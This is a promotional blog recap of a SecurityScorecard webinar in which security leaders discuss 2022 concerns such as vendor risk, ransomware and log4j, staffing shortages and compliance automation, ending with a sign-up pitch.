As organizations look to take their 2022 security concerns head-on, they need to create resilient cybersecurity programs that help them make smarter, faster, informed decisions. In our recent webinar, I had the pleasure of chatting with security professionals Mike Wilkes from SecurityScorecard, Scott Fuller from Access Health, and John Beal from St. Charles Health. They discuss the challenges they face and how their security plans for 2022 to mitigate risk across their entire ecosystem. Here’s a recap of what we learned and what they’re predicting for 2022.
Securing the supply chain
From a security operations standpoint, organizations struggle to manage third-party vendor risk across their ecosystem because they often lack the data necessary to make decisions.
On this topic, John Beal shared: “We found that when we actually engage with a vendor with the physical hard report it really started open dialogue. IT started really building the trust between us and our vendors that was very beneficial going forward.”
As companies scale, they need to ensure that they’re doing their due diligence and managing their documentation.
“I want to be able to get beyond just having the burden of answering those questions and helping keep the business moving,” said Mike Wilkes. “Some people take three to six month to fill out these questionnaires in the old school way.”
The time companies spend trying to get their due diligence completed often slows down important business operations. Automating this process to enable bulk assessments is a key step that every organization must take to stay ahead of risk in 2022.
Prospects of a ransomware attack and vulnerabilities
Going into 2022, the potential of a ransomware attack that starts with CVEs is a high priority for most organizations. The recent log4j vulnerability only makes these concerns more pressing.
“These basic hygiene things, that’s what open source intelligence and our scanning of the internet every day helps with. It’s revealing 30 billion to 40 billion vulnerabilities a week and 700 million malware events coming into our sinkholes every day,” shared Mike Wilkes. “There’s a whole lot of easy, low-hanging fruit out there that can be fixed.”
On a positive note, Scott believes that “it seems like as a whole the communication has gotten better. Most of the people that within the first couple of days of log4j coming to light have formulated a response and pushed it out to their customers in a proactive way,” he explained. “One of the things that I find encouraging is that there seems to be an overall maturity of security awareness and security programs across the board.”
John agrees on the ease of leveraging more readily available cybersecurity data to communicate with executives. “One of the things that I liked about SecurityScorecard is the data, but then it’s also you can create a report that’s really digestible to upper management and say ‘take a look at this,’ and they say, ‘that’s why that’s important,” he explained. “Maybe we don’t typically do maintenance on the weekends, but maybe we need to do maintenance this weekend to go ahead and patch this stuff because I can see why that’s important.”
Staffing shortage
Staffing across IT is challenging, but finding people with the right security credentials and experience brings its own difficulties.
For example, Scott shared that “your team has to do twice as much with half the team, so looking for solutions, looking for ways to automate.” In order to remediate this need to do more with less, automating tasks is key. “For me, lessons learned from the past is just how to magnify any resource you have and use them in the most effective way possible.”
Regulatory and compliance changes
Compliance includes due diligence documentation, but it also means responding to the ever-evolving regulatory landscape. Automating compliance moves the business forward because it reduces the time spent on repetitive, administrative tasks.
SecurityScorecard helps thousands of customers with continuous monitoring to meet compliance requirements. For example, Scott shared, “I currently use SecurityScorecard as an important part of monitoring our own security postures as well as holding ourselves to the same standards that our healthcare customers expect from us.”
Mike Wilkes chimed in on the power of an automated questionnaire management platform. “I answer your question once and it can be automatically pre-populated for me for several other frameworks,” he explained. “I think we have about 29 or 30 different frameworks, including HIPAA and PCI. For example, the average questionnaire turnaround is seven days with three iterations.”
SecurityScorecard: Security Ratings for Clearing Hurdles
SecurityScorecard’s security ratings platform provides the visibility organizations need to monitor, remediate, and track cybersecurity risks. Create your free account today to see how SecurityScorecard can strengthen your 2022 plans.
You can watch our webinar “Clearing Security Hurdles Faster to Drive Business Forward in 2022” on demand to see how SecurityScorecard helps customers achieve their security and business goals.